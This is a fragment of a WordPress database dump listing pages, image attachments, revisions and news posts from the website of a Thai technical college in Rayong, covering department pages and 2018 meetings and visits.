(3310, 3, '2018-07-04 15:28:09', '2018-07-04 08:28:09', '<a href=\"/%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99/1-14/\"><img class=\"alignnone size-full wp-image-11881\" src=\"/wp-content/uploads/2021/06/1-2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'เทคนิคพื้นฐาน', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99', '', '', '2021-06-28 12:45:59', '2021-06-28 05:45:59', '', 0, 'http://www.technicrayong.ac.th/?page_id=3310', 0, 'page', '', 0),
(3311, 3, '2018-07-04 15:27:18', '2018-07-04 08:27:18', '', '4-7-2561 15-17-37', '', 'inherit', 'closed', 'closed', '', '4-7-2561-15-17-37', '', '', '2018-07-04 15:27:18', '2018-07-04 08:27:18', '', 3310, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-15-17-37.jpg', 0, 'attachment', 'image/jpeg', 0),
(3312, 3, '2018-07-04 15:27:22', '2018-07-04 08:27:22', '', '4-7-2561 15-17-48', '', 'inherit', 'closed', 'closed', '', '4-7-2561-15-17-48', '', '', '2018-07-04 15:27:22', '2018-07-04 08:27:22', '', 3310, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-15-17-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(3313, 3, '2018-07-04 15:27:24', '2018-07-04 08:27:24', '', '4-7-2561 15-28-36', '', 'inherit', 'closed', 'closed', '', '4-7-2561-15-28-36', '', '', '2018-07-04 15:27:24', '2018-07-04 08:27:24', '', 3310, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-15-28-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(3314, 3, '2018-07-04 15:28:09', '2018-07-04 08:28:09', '<img class=\"aligncenter size-full wp-image-3311\" src=\"/wp-content/uploads/2018/07/4-7-2561-15-17-37.jpg\" alt=\"\" width=\"193\" height=\"240\" /> <img class=\"aligncenter wp-image-3312\" src=\"/wp-content/uploads/2018/07/4-7-2561-15-17-48-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" /> <img class=\"aligncenter wp-image-3313 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-15-28-36.jpg\" alt=\"\" width=\"812\" height=\"636\" />', 'เทคนิคพื้นฐาน', '', 'inherit', 'closed', 'closed', '', '3310-revision-v1', '', '', '2018-07-04 15:28:09', '2018-07-04 08:28:09', '', 3310, 'http://www.technicrayong.ac.th/3310-revision-v1/', 0, 'revision', '', 0),
(3316, 3, '2018-07-04 15:29:38', '2018-07-04 08:29:38', '', 'เทคนิคพื้นฐาน', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=3316', 72, 'nav_menu_item', '', 0),
(3317, 3, '2018-07-05 11:15:34', '2018-07-05 04:15:34', '<img class=\"aligncenter size-full wp-image-3319\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-08-11.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3318\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-06-20-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" /> <img class=\"aligncenter wp-image-3320 size-full\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-12-13.jpg\" alt=\"\" width=\"509\" height=\"340\" />', 'คหกรรมศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-07-05 11:15:34', '2018-07-05 04:15:34', '', 0, 'http://www.technicrayong.ac.th/?page_id=3317', 0, 'page', '', 0),
(3318, 3, '2018-07-05 11:11:55', '2018-07-05 04:11:55', '', '5-7-2561 11-06-20', '', 'inherit', 'closed', 'closed', '', '5-7-2561-11-06-20', '', '', '2018-07-05 11:11:55', '2018-07-05 04:11:55', '', 3317, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/5-7-2561-11-06-20.jpg', 0, 'attachment', 'image/jpeg', 0),
(3319, 3, '2018-07-05 11:11:59', '2018-07-05 04:11:59', '', '5-7-2561 11-08-11', '', 'inherit', 'closed', 'closed', '', '5-7-2561-11-08-11', '', '', '2018-07-05 11:11:59', '2018-07-05 04:11:59', '', 3317, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/5-7-2561-11-08-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(3320, 3, '2018-07-05 11:12:10', '2018-07-05 04:12:10', '', '5-7-2561 11-12-13', '', 'inherit', 'closed', 'closed', '', '5-7-2561-11-12-13', '', '', '2018-07-05 11:12:10', '2018-07-05 04:12:10', '', 3317, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/5-7-2561-11-12-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(3321, 3, '2018-07-05 11:15:34', '2018-07-05 04:15:34', '<img class=\"aligncenter size-full wp-image-3319\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-08-11.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3318\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-06-20-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" /> <img class=\"aligncenter wp-image-3320 size-full\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-12-13.jpg\" alt=\"\" width=\"509\" height=\"340\" />', 'คหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '3317-revision-v1', '', '', '2018-07-05 11:15:34', '2018-07-05 04:15:34', '', 3317, 'http://www.technicrayong.ac.th/3317-revision-v1/', 0, 'revision', '', 0),
(3323, 3, '2018-07-05 11:16:08', '2018-07-05 04:16:08', '<img class=\"aligncenter size-full wp-image-3319\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-08-11.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3318\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-06-20-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" /> <img class=\"aligncenter wp-image-3320 size-full\" src=\"/wp-content/uploads/2018/07/5-7-2561-11-12-13.jpg\" alt=\"\" width=\"509\" height=\"340\" />', 'คหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '3317-autosave-v1', '', '', '2018-07-05 11:16:08', '2018-07-05 04:16:08', '', 3317, 'http://www.technicrayong.ac.th/3317-autosave-v1/', 0, 'revision', '', 0),
(3324, 3, '2018-07-05 11:16:04', '2018-07-05 04:16:04', '', '22-5-2561 15-19-23', '', 'inherit', 'closed', 'closed', '', '22-5-2561-15-19-23-2', '', '', '2018-07-05 11:16:04', '2018-07-05 04:16:04', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/22-5-2561-15-19-23.jpg', 0, 'attachment', 'image/jpeg', 0),
(3325, 3, '2018-07-05 11:16:59', '2018-07-05 04:16:59', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3324 size-full\" src=\"/wp-content/uploads/2018/07/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"680\" height=\"335\" />\r\n<h4><strong><a href=\"/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf\">แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม</a></strong></h4>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf\">สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004</a></strong></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\n \r\n\r\nhttps://youtu.be/6GHMLwQ-sI8\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&amp;feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-07-05 11:16:59', '2018-07-05 04:16:59', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(3326, 3, '2018-07-10 09:55:21', '2018-07-10 02:55:21', '<a href=\"/%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8/1-19/\"><img class=\"alignnone size-full wp-image-11907\" src=\"/wp-content/uploads/2021/07/1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8/2-14/\"><img class=\"alignnone size-full wp-image-11908\" src=\"/wp-content/uploads/2021/07/2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'เทคโนโลยีสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8', '', '', '2021-07-01 09:57:28', '2021-07-01 02:57:28', '', 0, 'http://www.technicrayong.ac.th/?page_id=3326', 0, 'page', '', 0),
(3327, 3, '2018-07-06 09:42:17', '2018-07-06 02:42:17', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.617286348647557&type=3\"><img class=\"aligncenter wp-image-3328 size-full\" src=\"/wp-content/uploads/2018/07/6-7-2561-9-40-02.jpg\" alt=\"\" width=\"405\" height=\"608\" /></a>', 'การประชุมสร้างความเข้าใจการจัดการศึกษาทวิภาคีร่วมกัน และสิทธิประโยชน์ให้กับสถานประกอบการเครือข่าย ประจำปีงบประมาณ 2561 วันพฤหัสบดีที่ 5 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2', '', '', '2018-07-06 09:42:17', '2018-07-06 02:42:17', '', 0, 'http://www.technicrayong.ac.th/?p=3327', 370, 'post', '', 0),
(3328, 3, '2018-07-06 09:40:18', '2018-07-06 02:40:18', '', '6-7-2561 9-40-02', '', 'inherit', 'closed', 'closed', '', '6-7-2561-9-40-02', '', '', '2018-07-06 09:40:18', '2018-07-06 02:40:18', '', 3327, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/6-7-2561-9-40-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(3329, 3, '2018-07-06 09:41:41', '2018-07-06 02:41:41', '', '36587813_617278435315015_5762643726547550208_o', '', 'inherit', 'closed', 'closed', '', '36587813_617278435315015_5762643726547550208_o', '', '', '2018-07-06 09:41:41', '2018-07-06 02:41:41', '', 3327, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36587813_617278435315015_5762643726547550208_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3330, 3, '2018-07-06 09:42:17', '2018-07-06 02:42:17', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.617286348647557&type=3\"><img class=\"aligncenter wp-image-3328 size-full\" src=\"/wp-content/uploads/2018/07/6-7-2561-9-40-02.jpg\" alt=\"\" width=\"405\" height=\"608\" /></a>', 'การประชุมสร้างความเข้าใจการจัดการศึกษาทวิภาคีร่วมกัน และสิทธิประโยชน์ให้กับสถานประกอบการเครือข่าย ประจำปีงบประมาณ 2561 วันพฤหัสบดีที่ 5 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3327-revision-v1', '', '', '2018-07-06 09:42:17', '2018-07-06 02:42:17', '', 3327, 'http://www.technicrayong.ac.th/3327-revision-v1/', 0, 'revision', '', 0),
(3331, 3, '2018-07-06 09:42:44', '2018-07-06 02:42:44', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.617286348647557&type=3\"><img class=\"aligncenter wp-image-3328 size-full\" src=\"/wp-content/uploads/2018/07/6-7-2561-9-40-02.jpg\" alt=\"\" width=\"405\" height=\"608\" /></a>', 'การประชุมสร้างความเข้าใจการจัดการศึกษาทวิภาคีร่วมกัน และสิทธิประโยชน์ให้กับสถานประกอบการเครือข่าย ประจำปีงบประมาณ 2561 วันพฤหัสบดีที่ 5 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3327-autosave-v1', '', '', '2018-07-06 09:42:44', '2018-07-06 02:42:44', '', 3327, 'http://www.technicrayong.ac.th/3327-autosave-v1/', 0, 'revision', '', 0),
(3332, 3, '2018-07-09 08:32:08', '2018-07-09 01:32:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D618328955209963%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยอาชีวศึกษาลำปาง เข้าศึกษาดูงานด้านการบริหารจัดการอาชีวศึกษาระบบทวิภาคี การบริหารจัดการสมาคม/ชมรมผู้ปกครอง วันศุกร์ที่ 6 กรกฎาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a5%e0%b8%b3%e0%b8%9b%e0%b8%b2', '', '', '2018-07-09 08:32:08', '2018-07-09 01:32:08', '', 0, 'http://www.technicrayong.ac.th/?p=3332', 369, 'post', '', 0),
(3333, 3, '2018-07-09 08:31:30', '2018-07-09 01:31:30', '', '36674210_618311515211707_7752222734406385664_o', '', 'inherit', 'closed', 'closed', '', '36674210_618311515211707_7752222734406385664_o', '', '', '2018-07-09 08:31:30', '2018-07-09 01:31:30', '', 3332, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36674210_618311515211707_7752222734406385664_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3334, 3, '2018-07-09 08:32:08', '2018-07-09 01:32:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D618328955209963%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยอาชีวศึกษาลำปาง เข้าศึกษาดูงานด้านการบริหารจัดการอาชีวศึกษาระบบทวิภาคี การบริหารจัดการสมาคม/ชมรมผู้ปกครอง วันศุกร์ที่ 6 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3332-revision-v1', '', '', '2018-07-09 08:32:08', '2018-07-09 01:32:08', '', 3332, 'http://www.technicrayong.ac.th/3332-revision-v1/', 0, 'revision', '', 0),
(3335, 3, '2018-07-09 08:32:19', '2018-07-09 01:32:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D618328955209963%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยอาชีวศึกษาลำปาง เข้าศึกษาดูงานด้านการบริหารจัดการอาชีวศึกษาระบบทวิภาคี การบริหารจัดการสมาคม/ชมรมผู้ปกครอง วันศุกร์ที่ 6 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3332-autosave-v1', '', '', '2018-07-09 08:32:19', '2018-07-09 01:32:19', '', 3332, 'http://www.technicrayong.ac.th/3332-autosave-v1/', 0, 'revision', '', 0),
(3336, 3, '2018-07-09 08:57:25', '2018-07-09 01:57:25', '<img class=\"aligncenter size-full wp-image-3337\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-13.jpg\" alt=\"\" width=\"195\" height=\"245\" /> <img class=\"aligncenter wp-image-3338\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-36.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3339 size-full\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-47-45.jpg\" alt=\"\" width=\"565\" height=\"347\" />', 'การท่องเที่ยว', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7', '', '', '2018-07-09 08:57:25', '2018-07-09 01:57:25', '', 0, 'http://www.technicrayong.ac.th/?page_id=3336', 0, 'page', '', 0),
(3337, 3, '2018-07-09 08:56:12', '2018-07-09 01:56:12', '', '9-7-2561 8-46-13', '', 'inherit', 'closed', 'closed', '', '9-7-2561-8-46-13', '', '', '2018-07-09 08:56:12', '2018-07-09 01:56:12', '', 3336, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-8-46-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(3338, 3, '2018-07-09 08:56:16', '2018-07-09 01:56:16', '', '9-7-2561 8-46-36', '', 'inherit', 'closed', 'closed', '', '9-7-2561-8-46-36', '', '', '2018-07-09 08:56:16', '2018-07-09 01:56:16', '', 3336, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-8-46-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(3339, 3, '2018-07-09 08:56:20', '2018-07-09 01:56:20', '', '9-7-2561 8-47-45', '', 'inherit', 'closed', 'closed', '', '9-7-2561-8-47-45', '', '', '2018-07-09 08:56:20', '2018-07-09 01:56:20', '', 3336, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-8-47-45.jpg', 0, 'attachment', 'image/jpeg', 0),
(3340, 3, '2018-07-09 08:57:25', '2018-07-09 01:57:25', '<img class=\"aligncenter size-full wp-image-3337\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-13.jpg\" alt=\"\" width=\"195\" height=\"245\" /> <img class=\"aligncenter wp-image-3338\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-36.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3339 size-full\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-47-45.jpg\" alt=\"\" width=\"565\" height=\"347\" />', 'การท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '3336-revision-v1', '', '', '2018-07-09 08:57:25', '2018-07-09 01:57:25', '', 3336, 'http://www.technicrayong.ac.th/3336-revision-v1/', 0, 'revision', '', 0),
(3341, 3, '2018-07-09 08:57:37', '2018-07-09 01:57:37', '<img class=\"aligncenter size-full wp-image-3337\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-13.jpg\" alt=\"\" width=\"195\" height=\"245\" /> <img class=\"aligncenter wp-image-3338\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-46-36.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3339 size-full\" src=\"/wp-content/uploads/2018/07/9-7-2561-8-47-45.jpg\" alt=\"\" width=\"565\" height=\"347\" />', 'การท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '3336-autosave-v1', '', '', '2018-07-09 08:57:37', '2018-07-09 01:57:37', '', 3336, 'http://www.technicrayong.ac.th/3336-autosave-v1/', 0, 'revision', '', 0),
(3342, 3, '2018-07-09 15:26:30', '2018-07-09 08:26:30', '<img class=\"aligncenter size-full wp-image-3343\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-22.jpg\" alt=\"\" width=\"191\" height=\"240\" /> <img class=\"aligncenter wp-image-3344\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-33.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3345\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-24-04.jpg\" alt=\"\" width=\"840\" height=\"334\" />', 'สังคมศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%a1%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-07-09 15:27:17', '2018-07-09 08:27:17', '', 0, 'http://www.technicrayong.ac.th/?page_id=3342', 0, 'page', '', 0),
(3343, 3, '2018-07-09 15:22:15', '2018-07-09 08:22:15', '', '9-7-2561 15-23-22', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-23-22', '', '', '2018-07-09 15:22:15', '2018-07-09 08:22:15', '', 3342, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-23-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(3344, 3, '2018-07-09 15:22:17', '2018-07-09 08:22:17', '', '9-7-2561 15-23-33', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-23-33', '', '', '2018-07-09 15:22:17', '2018-07-09 08:22:17', '', 3342, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-23-33.jpg', 0, 'attachment', 'image/jpeg', 0),
(3345, 3, '2018-07-09 15:22:18', '2018-07-09 08:22:18', '', '9-7-2561 15-24-04', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-24-04', '', '', '2018-07-09 15:22:18', '2018-07-09 08:22:18', '', 3342, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-24-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(3346, 3, '2018-07-09 15:26:30', '2018-07-09 08:26:30', '<img class=\"aligncenter size-full wp-image-3343\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-22.jpg\" alt=\"\" width=\"191\" height=\"240\" /> <img class=\"aligncenter wp-image-3344\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-33.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3345\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-24-04.jpg\" alt=\"\" width=\"840\" height=\"334\" />', 'สังคมศึกษา', '', 'inherit', 'closed', 'closed', '', '3342-revision-v1', '', '', '2018-07-09 15:26:30', '2018-07-09 08:26:30', '', 3342, 'http://www.technicrayong.ac.th/3342-revision-v1/', 0, 'revision', '', 0),
(3347, 3, '2018-07-09 15:27:26', '2018-07-09 08:27:26', '<img class=\"aligncenter size-full wp-image-3343\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-22.jpg\" alt=\"\" width=\"191\" height=\"240\" /> <img class=\"aligncenter wp-image-3344\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-23-33.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3345\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-24-04.jpg\" alt=\"\" width=\"840\" height=\"334\" />', 'สังคมศึกษา', '', 'inherit', 'closed', 'closed', '', '3342-autosave-v1', '', '', '2018-07-09 15:27:26', '2018-07-09 08:27:26', '', 3342, 'http://www.technicrayong.ac.th/3342-autosave-v1/', 0, 'revision', '', 0),
(3348, 3, '2018-07-09 15:42:46', '2018-07-09 08:42:46', '<img class=\"aligncenter size-full wp-image-3349\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-41-31.jpg\" alt=\"\" width=\"195\" height=\"240\" /> <img class=\"aligncenter wp-image-3350\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-42-02.jpg\" alt=\"\" width=\"382\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3351\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-43-45.jpg\" alt=\"\" width=\"765\" height=\"318\" />', 'สุขศึกษาและพลศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%a5%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-07-09 15:42:46', '2018-07-09 08:42:46', '', 0, 'http://www.technicrayong.ac.th/?page_id=3348', 0, 'page', '', 0),
(3349, 3, '2018-07-09 15:41:56', '2018-07-09 08:41:56', '', '9-7-2561 15-41-31', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-41-31', '', '', '2018-07-09 15:41:56', '2018-07-09 08:41:56', '', 3348, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-41-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(3350, 3, '2018-07-09 15:41:58', '2018-07-09 08:41:58', '', '9-7-2561 15-42-02', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-42-02', '', '', '2018-07-09 15:41:58', '2018-07-09 08:41:58', '', 3348, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-42-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(3351, 3, '2018-07-09 15:42:04', '2018-07-09 08:42:04', '', '9-7-2561 15-43-45', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-43-45', '', '', '2018-07-09 15:42:04', '2018-07-09 08:42:04', '', 3348, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-43-45.jpg', 0, 'attachment', 'image/jpeg', 0),
